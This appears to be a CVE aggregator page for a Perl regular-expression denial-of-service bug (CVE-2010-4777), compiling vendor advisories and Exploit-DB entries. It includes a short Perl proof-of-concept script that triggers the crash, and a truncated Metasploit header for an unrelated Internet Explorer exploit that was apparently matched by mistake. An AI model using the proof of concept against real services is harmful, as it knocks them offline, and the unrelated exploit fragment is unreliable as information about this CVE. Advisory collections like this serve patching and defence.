CVE-2010-4777
published 2014-02-10CVE-2010-4777: The Perl_reg_numbered_buff_fetch function in Perl 5.10.0, 5.12.0, 5.14.0, and other versions, when running with debugging enabled, allows context-dependent…
PriorityP425medium4.3CVSS 2.0
AVNACMAuNCNINAP
EXPLOIT
EPSS
6.02%
92.4th percentile
The Perl_reg_numbered_buff_fetch function in Perl 5.10.0, 5.12.0, 5.14.0, and other versions, when running with debugging enabled, allows context-dependent attackers to cause a denial of service (assertion failure and application exit) via crafted input that is not properly handled when using certain regular expressions, as demonstrated by causing SpamAssassin and OCSInventory to crash.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | perl | < perl 5.20.1-1 (bookworm) | perl 5.20.1-1 (bookworm) |
| perl | perl | — | — |
| perl | perl | — | — |
| perl | perl | — | — |
| perl | perl | >= 0 < 5.20.1-1 | 5.20.1-1 |
| perl | perl | >= 0 < 5.20.1-1 | 5.20.1-1 |
| perl | perl | >= 0 < 5.20.1-1 | 5.20.1-1 |
| perl | perl | >= 0 < 5.20.1-1 | 5.20.1-1 |
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:N/A:P
osv4.3MEDIUM
vendor_debian4.3LOW
vendor_redhat4.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-r32j-2hp8-5qh2: The Perl_reg_numbered_buff_fetch function in Perl 5
ghsa_unreviewed·2022-05-17
CVE-2010-4777 [MEDIUM] CWE-20 GHSA-r32j-2hp8-5qh2: The Perl_reg_numbered_buff_fetch function in Perl 5
The Perl_reg_numbered_buff_fetch function in Perl 5.10.0, 5.12.0, 5.14.0, and other versions, when running with debugging enabled, allows context-dependent attackers to cause a denial of service (assertion failure and application exit) via crafted input that is not properly handled when using certain regular expressions, as demonstrated by causing SpamAssassin and OCSInventory to crash.
OSV
CVE-2010-4777: The Perl_reg_numbered_buff_fetch function in Perl 5
osv·2014-02-10·CVSS 4.3
CVE-2010-4777 [MEDIUM] CVE-2010-4777: The Perl_reg_numbered_buff_fetch function in Perl 5
The Perl_reg_numbered_buff_fetch function in Perl 5.10.0, 5.12.0, 5.14.0, and other versions, when running with debugging enabled, allows context-dependent attackers to cause a denial of service (assertion failure and application exit) via crafted input that is not properly handled when using certain regular expressions, as demonstrated by causing SpamAssassin and OCSInventory to crash.
Red Hat
perl: assertion failure with certain regular expressions
vendor_redhat·2010-07-16·CVSS 4.3
CVE-2010-4777 [MEDIUM] perl: assertion failure with certain regular expressions
perl: assertion failure with certain regular expressions
The Perl_reg_numbered_buff_fetch function in Perl 5.10.0, 5.12.0, 5.14.0, and other versions, when running with debugging enabled, allows context-dependent attackers to cause a denial of service (assertion failure and application exit) via crafted input that is not properly handled when using certain regular expressions, as demonstrated by causing SpamAssassin and OCSInventory to crash.
Statement: Not vulnerable. This issue did not affect the versions of perl as shipped with Red Hat Enterprise Linux 4, 5, or 6 as they did not have asserts enabled.
Package: perl (Red Hat Enterprise Linux 4) - Not affected
Package: perl (Red Hat Enterprise Linux 5) - Not affected
Package: perl (Red Hat Enterprise Linux 6) - Not affected
Debian
CVE-2010-4777: perl - The Perl_reg_numbered_buff_fetch function in Perl 5.10.0, 5.12.0, 5.14.0, and ot...
vendor_debian·2010·CVSS 4.3
CVE-2010-4777 [MEDIUM] CVE-2010-4777: perl - The Perl_reg_numbered_buff_fetch function in Perl 5.10.0, 5.12.0, 5.14.0, and ot...
The Perl_reg_numbered_buff_fetch function in Perl 5.10.0, 5.12.0, 5.14.0, and other versions, when running with debugging enabled, allows context-dependent attackers to cause a denial of service (assertion failure and application exit) via crafted input that is not properly handled when using certain regular expressions, as demonstrated by causing SpamAssassin and OCSInventory to crash.
Scope: local
bookworm: resolved (fixed in 5.20.1-1)
bullseye: resolved (fixed in 5.20.1-1)
forky: resolved (fixed in 5.20.1-1)
sid: resolved (fixed in 5.20.1-1)
trixie: resolved (fixed in 5.20.1-1)
No detection rules found.
Exploit-DB
Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Remote Denial of Service
exploitdb·2011-03-23
CVE-2010-4777 Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Remote Denial of Service
Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Remote Denial of Service
---
source: https://www.securityfocus.com/bid/47006/info
Perl is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause an application implemented with affected perl code to abort, denying service to legitimate users.
#!/usr/bin/perl
my @x = ("A=B","AAAA=/");
utf8::upgrade $_ for @x;
$x[1] =~ s{/\s*$}{};
for (@x) {
m{^([^=]+?)\s*=.+$};
}
Exploit-DB
Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (MS06-067) (Metasploit)
exploitdb·2010-07-16
CVE-2006-4777 Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (MS06-067) (Metasploit)
Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (MS06-067) (Metasploit)
---
##
# $Id: ms06_067_keyframe.rb 9842 2010-07-16 02:33:25Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 HttpClients::IE,
# :ua_minver => "6.0",
# :javascript => true,
# :os_name => OperatingSystems::WINDOWS,
# :vuln_test => 'KeyFrame',
# :classid => 'DirectAnimation.PathControl',
# :rank => NormalRanking # reliable memory corruption
#})
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer Daxctle.OCX
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=628836http://forums.ocsinventory-ng.org/viewtopic.php?id=7215http://lists.opensuse.org/opensuse-security-announce/2011-05/msg00005.htmlhttp://lists.opensuse.org/opensuse-updates/2011-05/msg00025.htmlhttps://bugzilla.redhat.com/show_bug.cgi?id=694166https://listi.jpberlin.de/pipermail/postfixbuch-users/2011-February/055885.htmlhttps://rt.perl.org/Public/Bug/Display.html?id=76538http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=628836http://forums.ocsinventory-ng.org/viewtopic.php?id=7215http://lists.opensuse.org/opensuse-security-announce/2011-05/msg00005.htmlhttp://lists.opensuse.org/opensuse-updates/2011-05/msg00025.htmlhttps://bugzilla.redhat.com/show_bug.cgi?id=694166https://listi.jpberlin.de/pipermail/postfixbuch-users/2011-February/055885.htmlhttps://rt.perl.org/Public/Bug/Display.html?id=76538
2014-02-10
Published